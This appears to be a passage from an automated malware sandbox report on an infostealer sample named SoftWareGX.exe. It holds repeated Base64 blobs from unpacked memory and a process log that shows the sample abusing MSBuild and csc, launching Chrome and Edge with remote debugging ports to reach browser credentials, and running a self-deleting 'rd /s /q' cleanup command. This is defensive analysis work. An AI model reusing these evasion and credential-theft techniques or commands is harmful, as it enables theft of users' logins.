J2BtF1cuyKSyO0j14utQiN+322nxslO5OGuvDDGChhcRXO5/GJR6LqQh4Zv+1a3HoljF0p6cdbEWTsh4D7cQSWZeACkYKldAbA7H8M3zA304JVq+0ZX/wsUQw4qtvR1OCy25Q/dwiWsGKXTZsh5QESITHbV2kiiRJPYfsezra1hhjr+s3Eieg3REXqJIUfpWKRGdso5ZMR7HnQ3e2+kY5KPTALjLIylteu+aSElGzkRlY2fJNHvqPtHE+5+oHQrDyKWi05dQ3EOatHBPQnVoDhu/MH0C1+hhn/MxBeoS+tzUn4OY2a6j7b2eWicIeMpy5IGuVhQsjhbHPAHSCyiBOrc5KZ8z1yTEJ6rYSX6PgIy+Cpdk/VfmAVAqlwEwQzf+0D0aegzVOuvYEA1jysR10rPwvNdC6bC5PgeoDVp2meAjV/g4GOvL+bFyP/Tc/pOM+bCuRmH5ZrJhMGaPNPmFRls8+FYzlSXnaj3oyKeOiKmeX7DN8qfE4DlC7jGMwjN5bEJLMDwdRn8EHX6zpPF/otU4WS+W5NnuO4TNnuPw2FV+PpgYtyOMMQY+z+SxygNRHX4P/KmDPwbBsWKqrdiqWx2oFwKOXbwnThSc8wpshS4WOrDd1iMUaV7LNMXuskJQsJZvldVvFyQl/tJvUEUGd2goM+MhleJvNq3gnrdwSf6X0FXC6n69cdPvOARDdiUNHo4rIFkmr/Spn0u9EC6yu+TcgquZqT6ruMUdQl/B9TvPgMU/QmUJebKfeBETDtzNuu88UCjOF+n4809kebfT2NWRoiNwSAo6CVyPY5ClzGfSGSAqT5QZ
                Source: 5.2.SoftWareGX.exe.3d5a42c.1.raw.unpack, Knvbl.csBase64 encoded string: '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
                Source: 5.2.SoftWareGX.exe.3d6b958.2.raw.unpack, Knvbl.csBase64 encoded string: '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
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@103/328@30/49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0041C0A0 CreateToolhelp32Snapshot,Process32First,Process32Next,TerminateProcess,15_2_0041C0A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\3VV4VCED.htmJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
                Source: C:\Users\user\Desktop\SoftWareGX.exeFile created: C:\Users\user\AppData\Local\Temp\m3uz1vzdJump to behavior
                Source: SoftWareGX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SoftWareGX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: jwb1nycjm.15.dr, u3wl6p8ym.15.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SoftWareGX.exeVirustotal: Detection: 13%
                Source: unknownProcess created: C:\Users\user\Desktop\SoftWareGX.exe "C:\Users\user\Desktop\SoftWareGX.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SoftWareGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
